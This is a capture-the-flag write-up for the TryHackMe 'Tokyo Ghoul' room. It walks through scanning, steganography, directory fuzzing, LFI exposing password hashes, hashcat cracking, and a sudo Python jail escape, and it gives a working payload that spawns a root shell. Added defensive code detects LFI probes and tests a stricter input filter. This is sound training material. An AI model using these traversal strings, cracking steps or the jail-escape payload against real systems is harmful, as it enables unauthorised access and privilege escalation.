Tokyo Ghoul — TryHackMe

This is a write-up for TryHackMe’s room “Tokyo Ghoul”. You can find the room here:

https://tryhackme.com/room/tokyoghoul666

The task is to find the user and root flags and, along the way, answer the questions asked. So let’s help Kaneki escape Jason’s room and start the enumeration process using Nmap.

Enumeration

NMAP

# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.0.178

$ sudo nmap -sS -Pn -T4 -p- 10.10.0.178
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.0.178

$ sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.0.178

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 3 ftp ftp 4096 Jan 23 22:26 need_Help?
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.98.192
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fa:9e:38:d3:95:df:55:ea:14:c9:49:d8:0a:61:db:5e (RSA)
| 256 ad:b7:a7:5e:36:cb:32:a0:90:90:8e:0b:98:30:8a:97 (ECDSA)
|_ 256 a2:a2:c8:14:96:c5:20:68:85:e5:41:d0:aa:53:8b:bd (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome To Tokyo goul

From the scan results we can answer the questions asked in the first section.

HTTP Port 80

Checking the web server on port 80 with a browser, I found the following comment in the page source of the link on the main page (Can you help him escape?):

<!-- look don't tell jason but we will help you escape , here is some clothes to look like us and a mask to look anonymous and go to the ftp room right there you will find a friend who will help you -->

OK, so let’s check out the FTP server, which has anonymous access enabled.

FTP

Found these three files by checking all the directories accessible via FTP:

  • Aogiri_tree.txt: hints that we are after someone called “Rize”
  • need_to_talk: an executable that asks for a key and then gives us the passphrase for “Rize”
  • rize_and_kaneki.jpg: holds another note from Rize

Ran rabin2 -z on the need_to_talk executable and found the key, which is then supplied as input when running need_to_talk:

rabin2

Ghidra can also be used to analyse this executable; hovering the mouse over the values highlighted in the middle section reveals the key:

ghidra

Finally, the executable gave us the passphrase for rize_and_kaneki.jpg, and the hidden data was extracted with steghide:

$ steghide info rize_and_kaneki.jpg
"rize_and_kaneki.jpg":
format: jpeg
capacity: 2.7 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "yougotme.txt":
size: 377.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
$ steghide extract -sf rize_and_kaneki.jpg
Enter passphrase:
wrote extracted data to "yougotme.txt".
$ cat yougotme.txt
haha you are so smart kaneki but can you talk my code
..... .-
....- ....-
....- -....
--... ----.
....- -..
...-- ..---
....- -..
...-- ...--
....- -..
....- ---..
....- .-
...-- .....
..... ---..
...-- ..---
....- .
-.... -.-.
-.... ..---
-.... .
..... ..---
-.... -.-.
-.... ...--
-.... --...
...-- -..
...-- -..
if you can talk it all right you got my secret directory

This looks like Morse code. Using CyberChef to decode it:

cyberchef

This gives us a directory; appending it to the main web page URL gives us a hint to scan it, so let’s use ffuf to scan that directory:

$ ffuf -u http://10.10.3.63/[REDACTED]/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/ __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

v1.2.1
________________________________________________
:: Method : GET
:: URL : http://10.10.3.63/[REDACTED]/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
index.html [Status: 200, Size: 312, Words: 21, Lines: 15]
claim [Status: 301, Size: 325, Words: 20, Lines: 10]
.html [Status: 403, Size: 275, Words: 20, Lines: 10]
.php [Status: 403, Size: 275, Words: 20, Lines: 10]
[Status: 200, Size: 312, Words: 21, Lines: 15]
:: Progress: [882184/882184] :: Job [1/1] :: 1840 req/sec :: Duration: [0:09:05] :: Errors: 0 ::

So let’s browse to the “claim” directory:

Clicking either YES or NO reveals a parameter named “view”, which can be tested for a Local File Inclusion (LFI) vulnerability:

LFI param

Capture this request in Burp Suite, send it to the Intruder tab and use the following LFI list from SecLists (installed by default on Kali) as the payload:

/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt

burp intruder LFI
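From the defender’s side, the same Intruder run leaves a very recognisable trail in the web server’s access log, and the underlying bug is a file-name parameter used without a containment check. The following is an added example (not the room’s code or the author’s): the log lines and the /claim/index.php path are constructed, and safe_view() is a hypothetical hardened version of what the “view” handler should do.

```python
import os
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed Apache access-log lines (not from the room) in the shape a Burp
# Intruder run with an LFI wordlist against the "view" parameter leaves behind.
SAMPLE_LOG = """\
10.8.98.192 - - [23/Jan/2021:22:30:01 +0000] "GET /claim/index.php?view=yes.gif HTTP/1.1" 200 312
10.8.98.192 - - [23/Jan/2021:22:30:02 +0000] "GET /claim/index.php?view=../../../../etc/passwd HTTP/1.1" 200 1441
10.8.98.192 - - [23/Jan/2021:22:30:03 +0000] "GET /claim/index.php?view=..%2F..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 950
10.8.98.192 - - [23/Jan/2021:22:30:04 +0000] "GET /claim/index.php?view=%252e%252e%2F%252e%252e%2Fetc%2Fpasswd HTTP/1.1" 200 1441
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def view_param(request_target):
    """Return the 'view' query value (URL-decoded once by parse_qs), or None."""
    values = parse_qs(urlparse(request_target).query).get("view")
    return values[0] if values else None

def normalize(value):
    """Decode a second time: LFI probes are often double-encoded (%252e), and
    backslashes are folded to slashes so Windows-style traversal is caught too."""
    return unquote(unquote(value)).replace("\\", "/")

def is_lfi_attempt(value):
    """Traversal, an absolute path or a NUL byte in a file-name parameter is never legitimate."""
    v = normalize(value)
    return "../" in v or v.startswith("/") or "\x00" in v

def flag_lfi(log_text):
    """Detection: return the normalized 'view' values that look like LFI probes."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        value = view_param(match.group(1)) if match else None
        if value is not None and is_lfi_attempt(value):
            hits.append(normalize(value))
    return hits

def safe_view(base_dir, requested):
    """Mitigation: resolve the requested file and serve it only if it stays inside base_dir.
    realpath() also collapses symlinks, which a plain string comparison would miss."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    return target if os.path.commonpath([base, target]) == base else None
```

Note that os.path.join() discards base when requested is absolute, so the realpath/commonpath check is what actually enforces containment, not the join.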

Aha, it worked, and the username and password hash for rize are exposed. Put the hash in a file named hash.txt and look up the type of hashes starting with $6$ on the hashcat example-hashes page:

hashcat examples

Use the following command to crack the password hash:

hashcat -m 1800 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

The hash will be cracked very fast, as it is a very commonly used password :)

User.txt

Now use rize’s username and password to log in to the target over SSH. The user flag is in rize’s home directory:

user flag

Root.txt

Now check what rize can run as root on the target using sudo -l:

sudo -l

So rize can run jail.py with sudo. Let’s have a look at it:

#! /usr/bin/python3
#-*- coding:utf-8 -*-
def main():
    print("Hi! Welcome to my world kaneki")
    print("===========================================================")
    print("What ? You gonna stand like a chicken ? fight me Kaneki")
    text = input('>>> ')
    # Substring blocklist: refuse the input if any of these words appears in it
    for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']:
        if keyword in text:
            print("Do you think i will let you do this ??????")
            return;
    else:
        # for/else: runs only when the loop finished without hitting the return above
        exec(text)
        print('No Kaneki you are so dead')
if __name__ == "__main__":
    main()

We need to break this “jail”: the keywords in the for loop block the obvious Python calls that would give us a root shell, and we cannot edit the file as we don’t have permission to do so. I found a lot of techniques here to bypass Python sandboxes; the Python builtins proved very useful for bypassing the restrictions, and I used the following as input to the jail.py script:

__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('/bin/bash')

Then ran the script with sudo, supplying that input, to get the root shell:

sudo /usr/bin/python3 /home/kamishiro/jail.py

root flag
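Why the keyword filter in jail.py does not hold, contrasted with a parse-based allowlist, as an added example (not the room’s code or the author’s). The ALLOWED_NODES and ALLOWED_NAMES sets are my assumption of what the prompt would legitimately need; the payload constant is the input shown above, kept here only as a test case. Even the stricter filter is damage limitation: the actual fix is not to exec() untrusted input at all, least of all under sudo.

```python
import ast

# The blocklist jail.py uses, copied from the script shown above.
BLOCKED = ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']

# The bypass input shown above, quoted only as a test case for the two filters.
PAGE_PAYLOAD = ("__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower())"
                ".__dict__['SYSTEM'.lower()]('/bin/bash')")

# Assumed allowlist: simple expressions, arithmetic and calls to a few builtins.
ALLOWED_NODES = (ast.Module, ast.Expr, ast.Call, ast.Name, ast.Load, ast.Constant,
                 ast.BinOp, ast.Add, ast.Sub, ast.Mult, ast.Div)
ALLOWED_NAMES = {'print', 'len', 'str', 'int'}


def keyword_blocklist_allows(text):
    """The check jail.py actually performs: a case-sensitive substring blocklist.
    Every blocked word can be produced at run time ('OS'.lower()) without ever
    appearing in the text, so the filter sees nothing to refuse."""
    return not any(word in text for word in BLOCKED)


def ast_allowlist_allows(text):
    """A stricter check: parse first, then refuse any syntax not on the allowlist.
    Attribute access (.__dict__), subscripts ([...]) and unknown identifiers
    (including __builtins__) are all rejected, so the lookup chain cannot be expressed."""
    try:
        tree = ast.parse(text, mode='exec')
    except SyntaxError:
        return False
    for node in ast.walk(tree):
        if not isinstance(node, ALLOWED_NODES):
            return False
        if isinstance(node, ast.Name) and node.id not in ALLOWED_NAMES:
            return False
    return True


if __name__ == "__main__":
    for check in (keyword_blocklist_allows, ast_allowlist_allows):
        print(check.__name__, "accepts page payload:", check(PAGE_PAYLOAD),
              "| accepts print(2 + 3):", check("print(2 + 3)"))
```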

Hope you enjoyed reading this; I had a lot of fun solving the challenge, especially the Python jail break, and learned something new. Thanks for reading and have a nice day!

--

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs: Security+, PenTest+, AZ900